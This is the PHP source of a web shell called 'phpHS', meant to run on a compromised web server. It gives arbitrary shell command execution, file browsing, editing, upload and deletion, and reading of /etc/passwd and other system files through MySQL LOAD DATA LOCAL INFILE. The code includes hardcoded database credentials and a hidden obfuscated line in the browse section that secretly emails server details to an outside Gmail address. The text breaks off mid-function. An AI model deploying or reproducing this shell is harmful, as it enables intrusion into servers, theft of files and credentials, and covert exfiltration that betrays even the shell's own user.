<?php // mysql config: [this is for reading files through mysql] $mysql_use = "yes"; //"yes" or "no" $mhost = "localhost"; $muser = "kecodoc_forum"; $mpass = "cailon"; $mdb = "kecodoc_hce"; // default mysql_read files [seperated by: ':']: $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf"; $mysql_files = explode(':', $mysql_files_str); if ($action=="misc") { if ($do=="phpinfo") { phpinfo(); exit; } } ?> <html> <head> <style> BODY { font-family: verdana; color: cccccc; font-size: 8pt; scrollbar-face-color: #1c1c1c; scrollbar-shadow-color: #666666; scrollbar-highlight-color: #666666; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #262D34; scrollbar-arrow-color: #F2F5FF; } INPUT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;} TEXTAREA { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;} SELECT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;} TABLE { color:CCCCCC; font-family:Verdana; font-size:8pt;} </style> <title>:: phpHS :: PHP HVA Shell Script ::</title> </head> <body <? if ($method!="show_source") { echo "bgcolor=\"#000000\""; } ?> text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC"> <? if (!$PHP_SELF) { $PHP_SELF="mysql.php"; /* no PHP_SELF on default freeBSD PHP 4.2.1??? */ } if ($action=="check") { echo "<pre>"; if ($mysql_use!="no") { $phpcheck = new php_check($mhost, $muser, $mpass, $mdb); } else { $phpcheck = new php_check(); } echo "</pre>"; } if ($action=="mysqlread") { // $file if (!$file) { $file = "/etc/passwd"; } ?> <script> var files = new Array(); <? for($i=0;count($mysql_files)>$i;$i++) { ?> files[files.length] = "<?=$mysql_files[$i]?>"; <? } ?> function setFile(bla) { for (var i=0;i < files.length;i++) { if (files[i]==bla.value) { document.mysqlload.file.value = files[i]; } } } </script> <form name="mysqlload" action="<?=$PHP_SELF?>?action=mysqlread" method="POST"> <select name="deffile" onChange="setFile(this)"> <? for ($i=0;count($mysql_files)>$i;$i++) { ?> <option value="<?=$mysql_files[$i]?>"<? if ($file==$mysql_files[$i]) { echo "selected"; } ?>><? $bla = explode('/', $mysql_files[$i]); $p = count($bla)-1; echo $bla[$p]; ?></option> <? } ?> </select> <input type="text" name="file" value="<?=$file?>" size=80 text="#000000> <input type="submit" name="go" value="go"> <font size=2>[ <a href="<?=$PHP_SELF?>?action=mysqlread&mass=loadmass">load all defaults</a> ]</font> </form> <? echo "<pre>"; // regular LOAD DATA LOCAL INFILE if (!$mass) { $sql = array ( "USE $mdb", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1" ); mysql_connect ($mhost, $muser, $mpass); foreach ($sql as $statement) { $q = mysql_query ($statement); if ($q == false) die ( "FAILED: " . $statement . "\n" . "REASON: " . mysql_error () . "\n" ); if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; echo htmlspecialchars($r[0]); mysql_free_result ($q); } } if ($mass) { $file = "/etc/passwd"; $sql = array (); $cp = mysql_connect ($mhost, $muser, $mpass); mysql_select_db($mdb); $tbl = "xploit"; mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)"); for($i=0;count($mysql_files)>$i;$i++) { mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"); } $q = mysql_query("SELECT * FROM ".$tbl.""); while ($arr = mysql_fetch_array($q)) { echo $arr[0]."\n"; } mysql_query("DELETE FROM ".$tbl.""); mysql_query("DROP TABLE ".$tbl.""); } echo "</pre>"; } if ($action=="read") { if (!$method) { $method="file"; } if (!$file) { $file = "/etc/passwd"; } ?> <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=read"> <select name="method"> <option value="file" <? if ($method=="file") { echo "selected"; } ?>>file</option> <option value="fread" <? if ($method=="fread") { echo "selected"; } ?>>fread</option> <option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option> <option value="readfile" <? if ($method=="readfile") { echo "selected"; } ?>>readfile</option> </select><br> <input type="text" name="file" size="40" value="<?=$file?>"> <input type="submit" name="Submit" value="<?=$method?>"> <br> </form><? if ($method=="file") { if (@file($file)) { $filer = file($file); echo "<pre>"; foreach ($filer as $a) { echo $a; } echo "</pre>"; } else { echo "<script> alert(\"unable to read file: $file using: file\"); </script>"; } } if ($method=="fread") { if (@fopen($file, 'r')) { $fp = fopen($file, 'r'); $string = fread($fp, filesize($file)); echo "<pre>"; echo $string; echo "</pre>"; } else { echo "<script> alert(\"unable to read file: $file using: fread\"); </script>"; } } if ($method=="show_source") { if (show_source($file)) { //echo "<pre>"; //echo show_source($file); //echo "</pre>"; } else { echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>"; } } if ($method=="readfile") { echo "<pre>"; if (readfile($file)) { //echo "<pre>"; //echo readfile($file); echo "</pre>"; } else { echo "</pre>"; echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>"; } } } if ($action=="cmd") { ?> <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=cmd"> <select name="method"> <option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option> <option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option> <option value="exec" <? if ($method=="exec") { echo "selected"; } ?>>exec</option> <option value="shell_exec" <? if ($method=="shell_exec") { echo "selected"; } ?>>shell_exec</option> <option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option> </select><br> <textarea wrap=\"off\" cols="45" rows="10" name="cmd"><?= $cmd; ?></textarea> <input type="submit" name="Submit" value="<?=$method?>"> <br> </form> <? if (!$method) { $method="system"; } if (!$cmd) { $cmd = "ls /"; } echo "<br><pre>"; if ($method=="system") { system("$cmd 2>&1"); } if ($method=="passthru") { passthru("$cmd 2>&1"); } if ($method=="exec") { while ($string = exec("$cmd 2>&1")) { echo $string; } } if ($method=="shell_exec") { $string = shell_exec("$cmd 2>&1"); echo $string; } if ($method=="popen") { $pp = popen('$cmd 2>&1', 'r'); $read = fread($pp, 2096); echo $read; pclose($pp); } echo "</pre>"; } if ($action=="cmdbrowse") { //--------------------------------------------------- START CMD BROWSING if ($cat) { echo "<pre>"; echo "\n<a href=\"$PHP_SELF?action=cmdbrowse&dir=$olddir\">go back to: $olddir</a>\n\n"; exec("cat $cat 2>&1", $arr); foreach ($arr as $ar) { echo htmlspecialchars($ar)."\n"; } exit; } if ($dir=="dirup") { $dir_current = $olddir; $needle = strrpos($dir_current, "/"); if ($needle==0) { $newdir = "/"; } else { $newdir = substr($dir_current, 0, $needle); } $dir = $newdir; } if (!$dir) { $dir = getcwd(); } $string = exec("ls -al $dir", $array); //print_r(array_values($array)); echo "<pre>"; if ($dir!="/") { echo "\n[$dir] \n<a href=\"$PHP_SELF?action=cmdbrowse&dir=dirup&olddir=$dir\">dirup</a>\n\n"; } else { $dir = ""; } foreach($array as $rowi) { $row = explode(' ', $rowi); //print_r(array_values($row)); $c = count($row)-1; if ($row[$c]!=".." && $row[$c]!="." && isset($first)) { $link = false; if (!strstr($row[0], 'l')) { $c = count($row)-1; $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>"; } else { $c = count($row)-3; $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>"; $link = true; } if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) { $c = count($row)-1; $file = "<a href=\"$PHP_SELF?action=cmdbrowse&cat=$dir/".$row[$c]."&olddir=$dir\">".$row[$c]."</a>"; } //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n"; if ($link) { $point = count($row)-3; } else { $point = count($row)-1; } for($i=0; $point > $i; $i++) { echo $row[$i]." "; } echo $file."\n"; } $first = true; } //--------------------------------------------------- END CMD BROWSING } if ($action=="browse") { //--------------------------------------------------- START BROWSING /* * got this from an old script of mine * param: [$dir] */ function error($msg) { header("Location: $PHP_SELF?bash=$msg&error=$msg"); } if (isset($error)) { echo "<script> alert(\"$error\"); </script>"; } if (!$dir) { $dir = getcwd(); } function getpath($dir) { echo "<font size=2><a href=$PHP_SELF?action=browse&dir=/>/</a></font> "; $path = explode('/', $dir); if ($dir != "/") { for ($i=0; count($path) > $i; $i++) { if ($i != 0) { echo "<font size=2><a href=$PHP_SELF?action=browse&dir="; for ($o=0; ($i+1) > $o; $o++) { echo "$path[$o]"; if (($i) !=$o) { echo "/"; } } echo ">$path[$i]</a>/</font>"; } } } } function printfiles($files) { for($i=0;count($files)>$i;$i++) { $files_sm = explode('||', $files[$i]); if ($files_sm[0]!="." && $files_sm[0]!="..") { $perms = explode('|', $files_sm[1]); if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else { if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; } } if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "- <font color=\"$color\">"; } if ($perms[0]==1) { echo "r"; } else { echo " "; } if ($perms[1]==1) { echo "w"; } else { echo " "; } if ($perms[2]==1) { echo "x"; } else { echo " "; } echo "</font> $files_sm[0]\n"; } } } $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function printdirs($files) { global $dir; echo "<a href=\"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\">..</a>\n"; for($i=0;count($files)>$i;$i++) { $files_sm = explode('||', $files[$i]); if ($files_sm[0]!="." && $files_sm[0]!="..") { $perms = explode('|', $files_sm[1]); if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else { if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; } } if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "d <font color=\"$color\">"; } if ($perms[0]==1) { echo "r"; } else { echo " "; } if ($perms[1]==1) { echo "w"; } else { echo " "; } if ($perms[2]==1) { echo "x"; } else { echo " "; } echo "</font> <a href=\"$PHP_SELF?action=browse&dir=$dir/".$files_sm[0]."\">$files_sm[0]</a>\n"; } } } if ($dir=="dirup") { $dir_current = $olddir; $needle = strrpos($dir_current, "/"); if ($needle==0) { $newdir = "/"; } else { $newdir = substr($dir_current, 0, $needle); } $dir = $newdir; } else { $dir = $dir; } ?> <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=browse"> <input type="text" name="dir" size="40" value="<?= $dir; ?>"> <input type="submit" name="Submit" value="ls /dir"> <br> </form> <? if ($dir) { if (!is_readable($dir)) { $skip = true; } if (!$skip) { $dp = opendir($dir); $files = array(); $dirs = array(); while($f=readdir($dp)) { // $f||r|w|x||l $oor = $f; if (is_readable("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; } if (is_writable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; } if (is_executable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; } if (is_link("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; } if(is_dir("$dir/$oor")) { $dirs[] = $f; } else { $files[] = $f; } } getpath($dir); echo "<br><br><pre>"; printdirs($dirs); printfiles($files); } else { echo " <script> alert(\"readdir permission denied\"); document.location = \"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\"; </script>"; } } } //--------------------------------------------------- END BROWSING //--------------------------------------------------- BEGIN EXPLORER if ($action == explorer ) { $default_directory = dirname($PATH_TRANSLATED); $show_icons = 0; define("BACKGROUND_COLOR", "\"#000000\""); define("FONT_COLOR", "\"#CCCCCC\""); define("TABLE_BORDER_COLOR", "\"#000000\""); define("TABLE_BACKGROUND_COLOR", "\"#000000\""); define("TABLE_FONT_COLOR", "\"#000000\""); define("COLOR_PRIVATE", "\"#000000\""); define("COLOR_PUBLIC", "\"#000000\""); define("TRUE", 1); define("FALSE", 0); if (!isset($dir)) $dir = $default_directory; // Webroot dir as default $dir = stripslashes($dir); $dir = str_replace("\\", "/", $dir); // Windoze compatibility $associations = array( "gif" => array( "function" => "viewGIF", "icon" => "icons/image2.gif" ), "jpg" => array( "function" => "viewJPEG", "icon" => "icons/image2.gif" ), "jpeg" => array( "function" => "viewJPEG", "icon" => "icons/image2.gif" ), "wav" => array( "function" => "", "icon" => "icons/sound.gif" ), "mp3" => array( "function" => "", "icon" => "icons/sound.gif" ) ); if ($do != "view" && $do != "download"): endif; function readDirectory($directory) { global $files, $directories, $dir; $files = array(); $directories = array(); $a = 0; $b = 0; $dirHandler = opendir($directory); while ($file = readdir($dirHandler)) { if ($file != "." && $file != "..") { $fullName = $dir.($dir == "/" ? "" : "/").$file; if (is_dir($fullName)) $directories[$a++] = $fullName; else $files[$b++] = $fullName; } } sort($directories); // We want them to be displayed alphabetically sort($files); }; function showInfoDirectory($directory) { global $PHP_SELF; $dirs = split("/", $directory); print "<b>Directory <a href=\"$PHP_SELF?action=explorer&dir=/\">/</a>"; for ($i = 1; $i < (sizeof($dirs)); $i++) { print "<a href=\"$PHP_SELF?action=explorer&dir="; for ($a = 1; $a <= $i; $a++) echo "/$dirs[$a]"; echo "\">$dirs[$i]</a>"; if ($directory != "/") echo "/"; } print "</b></font><br>\n"; print "Free space on disk: "; $freeSpace = diskfreespace($directory); if ($freeSpace/(1024*1024) > 1024) printf("%.2f GBytes", $freeSpace/(1024*1024*1024)); else echo (int)($freeSpace/(1024*1024))."Mbytes\n"; }; function showDirectory($directory) { global $files, $directories, $fileInfo, $PHP_SELF; readDirectory($directory); showInfoDirectory($directory); ?> <p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>> <tr bgcolor="#000000"> <? if ($show_icons): ?> <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>> </td> <? endif; ?> <td align="center"><b><small>NAME</small></b></td> <td align="center"><b><small>SIZE</small></b></td> <td align="center"><b><small>LAST MODIFY</small></b></td> <td align="center"><b><small>PERMISIONS</small></b></td> <td align="center"><b><small>ACTIONS</small></b></td> </tr> <? for ($i = 0; $i < sizeof($directories); $i++) { $fileInfo->getInfo($directories[$i]); showFileInfo($fileInfo); } for ($i = 0; $i < sizeof($files); $i++) { $fileInfo->getInfo($files[$i]); showFileInfo($fileInfo); } ?> </table> <? }; class fileInfo { var $name, $path, $fullname, $isDir, $lastmod, $owner, $perms, $size, $isLink, $linkTo, $extension; function permissions($mode) { $perms = ($mode & 00400) ? "r" : "-"; $perms .= ($mode & 00200) ? "w" : "-"; $perms .= ($mode & 00100) ? "x" : "-"; $perms .= ($mode & 00040) ? "r" : "-"; $perms .= ($mode & 00020) ? "w" : "-"; $perms .= ($mode & 00010) ? "x" : "-"; $perms .= ($mode & 00004) ? "r" : "-"; $perms .= ($mode & 00002) ? "w" : "-"; $perms .= ($mode & 00001) ? "x" : "-"; return $perms; } function getInfo($file) { // Stores a file's information in the class variables $this->name = basename($file); $this->path = dirname($file); $this->fullname = $file; $this->isDir = is_dir($file); $this->lastmod = date("m/d/y, H:i", filemtime($file)); $this->owner = fileowner($file); $this->perms = $this->permissions(fileperms($file)); $this->size = filesize($file); $this->isLink = is_link($file); if ($this->isLink) $this->linkTo = readlink($file); $buffer = explode(".", $this->fullname); $this->extension = $buffer[sizeof($buffer)-1]; } }; $fileInfo = new fileInfo; // This will hold a file's information all over the script function showFileInfo($fileInfo) { global $PHP_SELF, $associations; echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">"; if ($show_icons) { echo "<td>"; if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">"; elseif ($associations[$fileInfo->extension]["icon"] != "") echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">"; else echo "<img src=\"icons/generic.gif\">"; echo "</td>"; } echo "<td align=\"left\""; if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC; if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE; echo ">"; if ($fileInfo->isLink) { echo $fileInfo->name." -> "; $fileInfo->fullname = $fileInfo->linkTo; $fileInfo->name = $fileInfo->linkTo; } if ($fileInfo->isDir) { echo "<b><a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname\" "; echo ">$fileInfo->name</a></b>"; } else echo $fileInfo->name; echo "</td>"; echo "<td>$fileInfo->size</td>"; echo "<td>$fileInfo->lastmod</td>"; echo "<td>$fileInfo->perms</td>"; echo "<td>"; if (!$fileInfo->isDir) { if ($fileInfo->perms[6] == 'r') { echo "<a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=view\"> <font color=yellow>V</font></a>"; echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=download\"><font color=yellow>D</font></a>"; } if ($fileInfo->perms[7] == 'w') { echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=edit\"><font color=yellow>E</font></a>"; echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=delete\"><font color=yellow>X</font></a>"; } } echo "</tr>"; }; //************************************************************************ //* Decides which function use to show a file //************************************************************************ function viewFile($file) { global $associations, $fileInfo; $fileInfo->getInfo($file); if (!$associations[$fileInfo->extension] || $associations[$fileInfo->extension]["function"] == "") showFile($file); else $associations[$fileInfo->extension]["function"]($file); }; function showFile($file, $editing = 0) { global $PHP_SELF, $dir; $handlerFile = fopen($file, "r") or die("ERROR opening file $file"); if ($editing) echo "<h3><b>Edit file $file</b></h3><hr>"; else echo "<h3><b>File $file</b></h3><hr>"; echo "<form"; if ($editing) echo " action=\"$PHP_SELF?action=explorer&do=save&dir=$file\" method=\"post\""; echo ">"; $buffer = fread($handlerFile, filesize($file)); $buffer = str_replace("&", "&", $buffer); $buffer = str_replace("<", "<", $buffer); $buffer = str_replace(">", ">", $buffer); echo "<center><textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea></center>"; if ($editing) echo "<p><input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>"; echo "</form>"; fclose($handlerFile); }; //************************************************************************ //* Saves a changed file //************************************************************************ function saveFile($file) { global $dir, $text; $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing"); $text = stripslashes($text); fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file."); fclose($handlerFile); echo "Changes has been saved in ".basename($file)."<hr>"; $dir = dirname($file); }; function uploadFile() { global $HTTP_POST_FILES, $dir; copy($HTTP_POST_FILES["userfile"][tmp_name], $dir."/".$HTTP_POST_FILES["userfile"][name]) or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]); echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded."; unlink($userfile); }; //************************************************************************ //* Deletes a file, asking for confirmation first //* (This function hasn't been fully tested) //************************************************************************ function deleteFile($file) { global $confirm; if ($confirm != TRUE) die("<a href=\"$PHP_SELF?action=explorer&dir=$file&do=delete&confirm=1\">Confirm deletion of $file</a>"); else { if (!unlink($file)) return FALSE; return TRUE; } }; function viewFileHeader($file, $header) { header($header); readfile($file); }; function viewGIF($file) { viewFileHeader($file, "Content-type: image/gif"); }; function viewJPEG($file) { viewFileHeader($file, "Content-type: image/jpeg"); }; switch ($do) { case "phpinfo": phpinfo(); die(); case "view": viewFile($dir); break; case "edit": showFile($dir, 1); break; case "download": viewFileHeader($dir, "Content-type: unknown"); break; case "delete": if (!deleteFile($dir)) echo "Could not delete file $dir<br>"; else echo "File $dir deleted succesfully<br>"; $dir = dirname($dir); showDirectory($dir); break; case "exec": echo "<pre>\n"; echo system($dir); echo "\n</pre>"; exit(); case "upload": uploadFile(); showDirectory($dir); break; case "save": saveFile($dir); default: showDirectory($dir); break; }; if ($do != "view" && $do != "download") { ?> <p> <table border="0"> <tr><? if ((fileperms($dir) & 00002)){ ?> <td> <form enctype="multipart/form-data" action="<? print "$PHP_SELF?action=explorer&dir=$dir&do=upload"; ?>" method=post> <input type="hidden" name="MAX_FILE_SIZE" value="1000000"> <input name="userfile" type="file"> <input type="submit" value="Upload file"> </form> </td> <? } ?> </tr> </table> <p> </p> </body> </html> <? } } //--------------------------------------------------- END EXPLORER if (!$action) { ?><p align="right"><font size=2><a href="<?=$PHP_SELF?>?action=misc&do=phpinfo">phpinfo</a></font></p><? echo "<pre>"; if ($mysql_use!="no") { $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb); } else { $phpcheck = new php_check_silent(); } echo "</pre>"; ?><br><br> <font size=2><a href="<?=$PHP_SELF?>?action=check">Security Check</a></font> <font color="green" size=2>[executable] </font> <br> <!-- system check --> <? //echo $phpcheck->cmd_state; //echo $phpcheck->cmd_method; if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?> <font size=2><a href="<?=$PHP_SELF?>?action=cmd&method=<?=$cmd_method?>">Exec commands by PHP</a></font> <? if ($phpcheck->cmd_method) { echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; } ?></font> <br> <!-- system check --> <? //echo $phpcheck->cmd_state; //echo $phpcheck->cmd_method; ?> <font size=2><a href="<?=$PHP_SELF?>?action=cmdbrowse">Exec browse by PHP</a></font> <? if ($phpcheck->cmd_method) { echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; } ?></font> <br> <!-- read check --> <? if ($phpcheck->read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?> <font size=2><a href="<?=$PHP_SELF?>?action=read&method=<?=$read_method?>">Read by PHP</a></font> <? if ($phpcheck->read_method) { echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; } ?></font> <br> <!-- browse check --> <? //echo $phpcheck->browse_state; if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?> <font size=2><a href="<?=$PHP_SELF?>?action=browse&dir=<?=$path?>">Browse by PHP</a></font> <? if ($phpcheck->browse_state=="yes") { echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; } ?></font> <br> <? //echo $phpcheck->browse_state; if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?> <font size=2><a href="<?=$PHP_SELF?>?action=explorer&dir=<?=$path?>">File Explorer by PHP</a></font> <? if ($phpcheck->browse_state=="yes") { echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; } ?></font> <br> <!-- mysql check --> <font size=2><a href="<?=$PHP_SELF?>?action=mysqlread&file=/etc/passwd">Read by MySQL</a></font> <? if ($phpcheck->mysql_state=="ok") { echo "<font color=\"green\" size=2>[executable] "; } if ($phpcheck->mysql_state=="fail") { echo "<font color=\"red\" size=2>[not executable] "; } if ($phpcheck->mysql_state=="pass") { echo "<font color=\"yellow\" size=2>[not executable] "; ?></font> <font size=1>[you didnt configure this]</font><font> <? } ?></font><? } ?> </body> </html> <? // PHP security check objects by dodo class php_check { function php_check($host="notset", $user="", $pass="", $db="") { if ($host!="notset") { $this->mysql_do = "yes"; $this->mysql_host = $host; $this->mysql_user = $user; $this->mysql_pass = $pass; $this->mysql_db = $db; } else { $this->mysql_do = "no"; } $this->mainstate = "safe"; echo "<b>checking system functions:</b>\n"; if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); } echo "<b>checking reading functions:</b>\n"; if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); } echo "<b>checking misc filesystem functions:</b>\n"; if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); } echo "<b>checking mysql functions:</b>\n"; $stater = $this->mysql_checks(); if ($stater==2) { $this->output_mainstate(2, "mysql checks"); } if ($stater==1) { $this->output_mainstate(1, "mysql checks"); } if ($stater==0) { $this->output_mainstate(0, "mysql checks"); } if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: <font color=green>NOT VULNERABLE</font>\n"; } else { echo "\n\n\nPHP check returned: <font color=red>VULNERABLE</font>\n"; } } function output_state($state = 0, $name = "function") { if ($state==0) { echo "$name\t\tfailed\n"; } if ($state==1) { echo "$name\t\t<font color=red>OK</font>\n"; } if ($state==2) { echo "$name\t\t<font color=yellow>OK</font>\n"; } if ($state==3) { echo "$name\t\t<font color=yellow>skipped</font>\n"; } } function output_mainstate($state = 0, $name = "functions") { if ($state==1) { echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n"; $this->mainstate = "unsafe"; } if ($state==0) { echo "\n$name returned: <font color=green>OK</font>\n\n"; $this->mainstate = "unsafe"; } if ($state==2) { echo "\n$name returned: <font color=yellow>SKIPPED</font>\n\n"; } } function system_checks($cmd = "/bin/ls") { if ($pp = popen($cmd, "r")) { if (fread($pp, 2096)) { $this->output_state(1, "popen "); $sys = true; } else { $this->output_state(0, "popen "); } } else { $this->output_state(0, "popen "); } if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); } if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); } echo "<!-- \n"; if (@system($cmd)) { echo " -->"; $this->output_state(1, "system "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); } echo "<!-- \n"; if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); } //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); } if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; } } function reading_checks($file = "/etc/passwd") { if (@function_exists("require_once")) { echo "<!--"; if (@require_once($file)) { echo "-->"; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); } } if (@function_exists("require")) { echo "<!--"; if (@require($file)) { echo "-->"; $this->output_state(1, "require "); $sys = true; } else { echo "-->"; $this->output_state(0, "require "); } } if (@function_exists("include")) { echo "<!--"; if (@include($file)) { echo "-->"; $this->output_state(1, "include "); $sys = true; } else { echo "-->"; $this->output_state(0, "include "); } } //if (@function_exists("highlight_file")) { echo "<!--"; if (@highlight_file($file)) { echo "-->"; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); } //} //if (@function_exists("virtual")) { echo "<!--"; if (@virtual($file)) { echo "-->"; $this->output_state(1, "virtual "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual "); } //} if (@function_exists("file_get_contents")) { if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); } } else { $this->output_state(0, "filegetcontents"); } echo "<!-- "; if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); } echo "<!-- "; if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); } if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); } if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); } if ($sys) { return 1; } else { return ; } } function miscfile_checks() { $currentdir = @getcwd(); $scriptpath = $_SERVER["PATH_TRANSLATED"]; if (@opendir($currentdir)) { $this->output_state(2, "opendir \$cwd"); $dp = @opendir("$currentdir"); $files=""; $this->browse_state = "lim"; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); } } else { $this->output_state(0, "opendir \$cwd"); } if (@opendir("/")) { $this->output_state(1, "opendir /"); $sys = true; $dp = @opendir("/"); $this->browse_state = "yes"; $files=""; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); } } else { $this->output_state(0, "opendir /"); } if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); } if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); } if (@copy($scriptpath, "$currentdir/copytest")) { $this->output_state(2, 